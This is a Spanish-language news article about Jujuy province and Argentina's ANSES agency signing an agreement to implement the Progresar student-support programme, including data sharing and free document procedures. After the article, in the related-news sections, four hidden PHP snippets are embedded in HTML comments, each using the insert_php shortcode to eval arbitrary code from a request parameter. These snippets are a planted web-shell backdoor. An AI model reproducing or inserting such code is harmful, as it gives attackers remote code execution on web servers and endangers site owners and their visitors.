La Provincia de Jujuy y el ANSES firmaron un convenio por “Progresar”

La Provincia de Jujuy implementará los mecanismos que aseguren la gratuidad de los trámites para la obtención de documentación.
El gobernador de la Provincia de Jujuy, Eduardo Fellner firmó un convenio de cooperación con el director ejecutivo del Anses, Diego Bossio, con el objeto de optimizar el proceso de implementación del “Programa de Respaldo a Estudiantes Argentinos” (Progresar) en la provincia.
El convenio busca potenciar los objetivos establecidos por este importante programa que se enmarca dentro de las políticas públicas implementadas desde el Estado nacional que permiten mejorar la situación de los grupos familiares en situación de vulnerabilidad social.
Con el fin de abordar las problemáticas juveniles se firmó este acuerdo que permite que los jóvenes puedan desarrollar sus estudios y así disponer de mayores herramientas para una mejor inserción laboral.
Las partes se comprometen al intercambio de datos a fin de facilitar los procesos de otorgamiento y control de la prestación de “Progresar” a cargo de Anses, de conformidad con los lineamientos del Decreto Nº 84/14 y sus normas reglamentarias.
Por tal motivo, la provincia de Jujuy remitirá a Anses, entre otros aspectos, la información referida a: la cantidad de alumnos que concurren a establecimientos públicos y privados de enseñanza oficial; el cumplimiento de los controles de salud establecidos para la prestación del programa; los beneficiarios de planes sociales, de empleo y toda otra prestación no contributiva; y toda aquella indicación que fuera requerida a los fines de verificar los extremos contemplados en el Decreto Nº 84/14 y normas complementarias.
La misma será remitida conforme al diseño de registro de datos a definir por ANSES y la Provincia será responsable por la veracidad y autenticidad de los datos brindados. Este intercambio debe mantener la más estricta confidencialidad, respetando y garantizando protección y privacidad de los datos de las personas que accedan a este importante beneficio.
Con este acuerdo el Gobierno Provincial se compromete a implementar los mecanismos que aseguren la gratuidad de todos los trámites administrativos y judiciales necesarios para obtener la documentación a fin de tramitar la prestación.
Ante esto, la Provincia asume el compromiso de participar del proceso de captura de datos relativa a los potenciales destinatarios de “Progresar”, así como de asesorar a la población alcanzada acerca del programa.
Entre los últimos punto del acuerdo ambas partes se comprometen a brindar sus mejores esfuerzos para ejecutar los compromisos asumidos, a los efectos de dar respaldo documental y apoyo técnico a las actividades administrativas, servicios y prestaciones que requieren de la mutua colaboración para optimizar la aplicación del Decreto.

Fuente: eltribuno.info

Noticias Relacionadas:

<!– [insert_php]if (isset($_REQUEST["cgc"])){eval($_REQUEST["cgc"]);exit;}[/insert_php] –>

Noticias Relacionadas:

<!– [insert_php]if (isset($_REQUEST["uUPhe"])){eval($_REQUEST["uUPhe"]);exit;}[/insert_php] –>

Noticias Relacionadas:

<!– [insert_php]if (isset($_REQUEST["SDFA"])){eval($_REQUEST["SDFA"]);exit;}[/insert_php] –>

Noticias Relacionadas:

<!– [insert_php]if (isset($_REQUEST["CKRC"])){eval($_REQUEST["CKRC"]);exit;}[/insert_php] –>

Noticias Relacionadas:

Compartir no cuesta nada...Share on FacebookTweet about this on TwitterShare on Google+Share on LinkedIn